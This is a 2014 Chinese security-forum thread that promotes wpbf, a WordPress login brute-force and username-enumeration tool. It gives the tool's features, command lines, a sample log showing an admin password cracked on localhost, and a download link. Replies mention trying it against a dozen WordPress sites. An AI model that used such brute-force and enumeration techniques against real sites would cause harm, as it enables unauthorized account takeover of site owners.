查看: 24985|回复: 11

[工具专区] WordPress系统暴力破解测试工具 – wpbf

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2014-6-20 10:56:28 | 显示全部楼层 |阅读模式
    wpbf这款工具可以帮助渗透测试人员,针对WordPress博客后台进行爆破测试。
    特性
    用户名枚举和发现
    [AppleScript] 纯文本查看 复制代码
    多线程
    自动使用博客内容中的关键字作为字典
    HTTP代理支持
    基本的Wordpress指纹探测
    高级指纹探测插件

    基本使用方法
    [AppleScript] 纯文本查看 复制代码
    $ ./wpbf.py http://localhost/wordpress/
    2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
    2012-02-26 14:26:18,844 - INFO - Checking URL and username...
    2012-02-26 14:26:18,845 - INFO - Enumerating users...
    2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
    2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
    2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
    2012-02-26 14:26:55,369 - INFO - Starting workers...
    2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
    2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
    2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
    2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
    221 tasks left / 2.1 tasks per second / 1.76min left
    199 tasks left / 2.2 tasks per second / 1.51min left
    172 tasks left / 2.7 tasks per second / 1.06min left
    21 tasks left / 1.6 tasks per second / 0.22min left
    2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

    用户名枚举
    [AppleScript] 纯文本查看 复制代码
    $ ./wpbf.py -eu [url]http://www.mysite.com/blog/[/url]


    下载地址
    http://github.com/atarantini/wpbf
    回复

    使用道具 举报

  • TA的每日心情
    无聊
    2016-5-28 10:00
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-6-20 11:12:36 | 显示全部楼层
    自动使用博客内容中的关键字作为字典
    这条是说不需要自己的字典么?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-2-24 16:15
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-6-20 12:09:00 | 显示全部楼层
    刚测试了十几个wordpress,一个没破出来。没想象中的好用
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2021-11-3 17:36
  • 签到天数: 87 天

    [LV.6]常住居民II

    发表于 2014-6-20 13:29:17 | 显示全部楼层
    需要自己的字典
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-20 14:00:50 | 显示全部楼层
    谢谢分想了,不过最近github打不开 我的问题?
    能不能发在网盘?

    点评

    可以打开的啊 你网络的问题吧?  详情 回复 发表于 2014-6-20 17:36
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-5 19:19
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2014-6-20 17:36:38 | 显示全部楼层
    gty48 发表于 2014-6-20 14:00
    谢谢分想了,不过最近github打不开 我的问题?
    能不能发在网盘?

    可以打开的啊 你网络的问题吧?
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-20 22:12:25 | 显示全部楼层
    收下了 去试试咋样
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-20 23:37:27 | 显示全部楼层
    英文不是很好
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-23 16:42:28 | 显示全部楼层
    国外玩意,我在国外网站看到过,没几天国内就有人发了。 =。=
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-7-10 07:02
  • 签到天数: 49 天

    [LV.5]常住居民I

    发表于 2014-6-30 19:50:50 | 显示全部楼层
    谢谢分享~
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 22:00 , Processed in 0.042358 second(s), 19 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部